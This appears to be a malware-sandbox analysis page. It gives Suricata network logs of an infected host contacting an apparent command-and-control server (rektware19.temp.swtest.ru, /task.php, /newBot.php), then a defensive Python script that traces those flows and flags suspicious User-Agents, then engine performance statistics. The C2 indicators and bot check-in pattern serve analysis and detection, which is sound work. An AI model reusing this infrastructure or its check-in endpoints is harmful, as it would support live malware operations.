{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a1-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a3-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a9-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a5-130.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a13-130.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a12-131.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a28-129.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a18-128.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a11-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a7-131.akadns.net"}}
{"timestamp":"1900-01-00T00:00:13.138205+0000","flow_id":609649133461125,"pcap_cnt":27,"event_type":"alert","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2012758,"rev":5,"signature":"ET INFO DYNAMIC_DNS Query to *.dyndns. Domain","category":"Misc activity","severity":3},"app_proto":"dns"}
{"timestamp":"1900-01-00T00:00:13.138205+0000","flow_id":609649133461125,"pcap_cnt":27,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44246,"rrname":"checkip.dyndns.org","rrtype":"A","tx_id":1}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.org","rrtype":"CNAME","ttl":369,"rdata":"checkip.dyndns.com"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"162.88.100.200"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.43.70"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.43.71"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.38.70"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"162.88.96.194"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns3.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns4.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns2.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns5.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns6.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns1.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns7.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021378,"rev":3,"signature":"ET POLICY External IP Lookup - checkip.dyndns.org","category":"Potential Corporate Privacy Violation","severity":1}}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"http","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"checkip.dyndns.org","url":"\/","http_user_agent":"AutoIt","http_content_type":"text\/html"}}
{"timestamp":"1900-01-00T00:00:13.314748+0000","flow_id":946471206462561,"pcap_cnt":40,"event_type":"alert","src_ip":"162.88.100.200","src_port":80,"dest_ip":"10.0.2.15","dest_port":1049,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014932,"rev":2,"signature":"ET POLICY DynDNS CheckIp External IP Address Server Response","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.314748+0000","flow_id":946471206462561,"pcap_cnt":40,"event_type":"fileinfo","src_ip":"162.88.100.200","src_port":80,"dest_ip":"10.0.2.15","dest_port":1049,"proto":"TCP","http":{"hostname":"checkip.dyndns.org","url":"\/","http_user_agent":"AutoIt","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":102},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":102,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:13.317966+0000","flow_id":609649133461125,"pcap_cnt":41,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1292,"rrname":"rektware19.temp.swtest.ru","rrtype":"A","tx_id":2}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"rektware19.temp.swtest.ru","rrtype":"A","ttl":369,"rdata":"77.222.40.79"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns1.spaceweb.ru"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns4.spaceweb.pro"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns2.spaceweb.ru"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns3.spaceweb.pro"}}
{"timestamp":"1900-01-00T00:00:13.412598+0000","flow_id":370732987964628,"pcap_cnt":49,"event_type":"alert","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.412598+0000","flow_id":370732987964628,"pcap_cnt":49,"event_type":"http","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/task.php","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:14.620642+0000","flow_id":575394622079958,"pcap_cnt":64,"event_type":"alert","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:14.620642+0000","flow_id":575394622079958,"pcap_cnt":64,"event_type":"http","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/task.php","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"alert","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2001891,"rev":19,"signature":"ET USER_AGENTS Suspicious User Agent (agent)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"http","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html"}}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":404,"length":1067},"app_proto":"http","fileinfo":{"filename":"\/newBot.php","gaps":false,"state":"CLOSED","stored":false,"size":111,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:15.620531+0000","flow_id":1950028969959987,"pcap_cnt":74,"event_type":"fileinfo","src_ip":"77.222.40.79","src_port":80,"dest_ip":"10.0.2.15","dest_port":1051,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":404,"length"

This file has been truncated.
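The eve.json records above already tell the story of this capture if they are read in order: the host resolves checkip.dyndns.org, fetches its external IP with an "AutoIt" User-Agent (ET sids 2008350 and 2021378), then resolves rektware19.temp.swtest.ru, hits /task.php with the same UA and POSTs to /newBot.php with the bare UA "agent" (sid 2001891). The script below is an added triage example, not Suricata's code nor anything from this page's analysis pipeline; it links each HTTP flow back to the DNS answer that produced its destination IP (following CNAME chains) and flags flows whose UA is on a watch-list. The watch-list itself is an assumption derived from the two UA signatures that fired here. The sample input is a trimmed copy of the eve.json lines shown on this page. One caveat worth noticing: the capture's clock is bogus (Suricata printed 1900-01-00 timestamps), so the script orders events by pcap_cnt rather than by timestamp.

```python
"""Triage of Suricata EVE JSON: tie HTTP flows back to the DNS answers
that produced their destination IPs, and flag suspicious User-Agents.

Added example, not part of the page or of Suricata. SAMPLE_EVE holds
trimmed copies of the eve.json records shown on this page so the
script runs offline.
"""
import json
from collections import defaultdict

# Assumption: User-Agent strings worth flagging. Derived from the two ET
# UA signatures that fired on this capture (AutoIt, bare "agent").
SUSPICIOUS_UA = {"AutoIt", "agent"}

SAMPLE_EVE = '''
{"timestamp":"1900-01-00T00:00:09.368261+0000","pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.15","dest_ip":"10.0.2.2","proto":"UDP","dns":{"type":"query","id":3285,"rrname":"time.windows.com","rrtype":"A"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","dest_ip":"10.0.2.15","proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","rdata":"time.microsoft.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","dest_ip":"10.0.2.15","proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","rdata":"51.141.32.51"}}
{"timestamp":"1900-01-00T00:00:13.138205+0000","pcap_cnt":27,"event_type":"dns","src_ip":"10.0.2.15","dest_ip":"10.0.2.2","proto":"UDP","dns":{"type":"query","id":44246,"rrname":"checkip.dyndns.org","rrtype":"A"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","dest_ip":"10.0.2.15","proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.org","rrtype":"CNAME","rdata":"checkip.dyndns.com"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","dest_ip":"10.0.2.15","proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","rdata":"162.88.100.200"}}
{"timestamp":"1900-01-00T00:00:13.314552+0000","pcap_cnt":38,"event_type":"http","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","http":{"hostname":"checkip.dyndns.org","url":"/","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:13.317966+0000","pcap_cnt":41,"event_type":"dns","src_ip":"10.0.2.15","dest_ip":"10.0.2.2","proto":"UDP","dns":{"type":"query","id":1292,"rrname":"rektware19.temp.swtest.ru","rrtype":"A"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","dest_ip":"10.0.2.15","proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"rektware19.temp.swtest.ru","rrtype":"A","rdata":"77.222.40.79"}}
{"timestamp":"1900-01-00T00:00:13.412598+0000","pcap_cnt":49,"event_type":"http","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"/task.php","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:14.646940+0000","pcap_cnt":65,"event_type":"http","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"/newBot.php","http_user_agent":"agent"}}
'''


def load_events(text):
    """Parse one JSON object per line and order by packet number.

    The capture's clock is bogus (Suricata printed 1900-01-00), so the
    timestamp field is useless as a sort key; pcap_cnt is monotonic.
    list.sort is stable, so answers sharing a pcap_cnt keep wire order.
    """
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    events.sort(key=lambda e: e["pcap_cnt"])
    return events


def build_resolution_map(events):
    """Map each resolved IP to the name(s) the client originally asked for.

    CNAME answers are stored as reverse edges (canonical -> alias) so an A
    record for checkip.dyndns.com walks back to checkip.dyndns.org.
    """
    alias_of = {}
    ip_to_names = defaultdict(set)
    for e in events:
        if e["event_type"] != "dns" or e["dns"].get("type") != "answer":
            continue
        d = e["dns"]
        if d.get("rrtype") == "CNAME":
            alias_of[d["rdata"]] = d["rrname"]
        elif d.get("rrtype") == "A":
            name, seen = d["rrname"], set()
            while name in alias_of and name not in seen:
                seen.add(name)
                name = alias_of[name]
            ip_to_names[d["rdata"]].add(name)
    return ip_to_names


def triage_http(events, ip_to_names):
    """One finding per HTTP transaction, annotated with its DNS provenance."""
    findings = []
    for e in events:
        if e["event_type"] != "http":
            continue
        h = e["http"]
        ua = h.get("http_user_agent", "")
        host = h.get("hostname")
        names = sorted(ip_to_names.get(e["dest_ip"], ()))
        findings.append({
            "pcap_cnt": e["pcap_cnt"],
            "dest": f'{e["dest_ip"]}:{e["dest_port"]}',
            "host": host,
            "url": h.get("url"),
            "user_agent": ua,
            "resolved_via": names,
            # False here means the Host header was never resolved on the wire:
            # a hard-coded IP, or DNS that happened outside the capture.
            "host_matches_dns": host in names,
            "suspicious_ua": ua in SUSPICIOUS_UA,
        })
    return findings


def infection_chain(text):
    """Return only the HTTP transactions with a watch-listed User-Agent, in order."""
    events = load_events(text)
    return [f for f in triage_http(events, build_resolution_map(events))
            if f["suspicious_ua"]]


if __name__ == "__main__":
    for f in infection_chain(SAMPLE_EVE):
        print(f'#{f["pcap_cnt"]:<4} {f["dest"]:<20} {f["host"]} {f["url"]} '
              f'UA={f["user_agent"]!r} via={f["resolved_via"]}')
```

Run against a full eve.json, replace SAMPLE_EVE with the file contents; the "host_matches_dns" flag is the useful pivot on larger captures, since C2 that connects by bare IP or resolves through a channel the sensor did not see shows up as an HTTP flow with no DNS provenance.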


keyword_perf.log (13174 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 7/25/2019 -- 05:57:36
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             41224616        7800            7800            538588          5285.00         5285.00         0.00           
  content          90605300        16018           9816            294042          5656.00         5654.00         5660.00        
  pcre             9859326         1574            780             64814           6263.00         5831.00         6688.00        
  byte_test        524676          95              67              26226           5522.00         5839.00         4764.00        
  byte_jump        86378           13              13              22484           6644.00         6644.00         0.00           
  isdataat         18798           4               0               4786            4699.00         0.00            4699.00        
  flowbits         1969164         370             54              44454           5322.00         7777.00         4902.00        
  urilen           4425262         836             54              29376           5293.00         5063.00         5309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             41224616        7800            7800            538588          5285.00         5285.00         0.00           
  flowbits         1554362         317             1               28110           4903.00         5178.00         4902.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8434606         1449            792             29944           5820.00         5736.00         5922.00        
  pcre             70690           7               0               14680           10098.00        0.00            10098.00       
  byte_test        524676          95              67              26226           5522.00         5839.00         4764.00        
  byte_jump        86378           13              13              22484           6644.00         6644.00         0.00           
  isdataat         18798           4               0               4786            4699.00         0.00            4699.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         414802          53              53              44454           7826.00         7826.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          20130632        3661            2082            53388           5498.00         5389.00         5642.00        
  pcre             6205248         1042            780             31304           5955.00         5831.00         6322.00        
  urilen           4425262         836             54              29376           5293.00         5063.00         5309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7213046         1248            156             31230           5779.00         5865.00         5767.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5292            1               0               5292            5292.00         0.00            5292.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1122578         208             0               36518           5397.00         0.00            5397.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34414700        5943            4638            83202           5790.00         5754.00         5918.00        
  pcre             3264320         473             0               64814           6901.00         0.00            6901.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4656514         784             315             30142           5939.00         6264.00         5720.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1379892         262             262             22916           5266.00         5266.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          9126506         1718            885             294042          5312.00         5642.00         4961.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2732612         476             422             70750           5740.00         5720.00         5898.00        
  pcre             319068          52              0               15778           6135.00         0.00            6135.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          304296          57              55              18648           5338.00         5347.00         5095.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1078998         210             208             27142           5138.00         5137.00         5168.00        
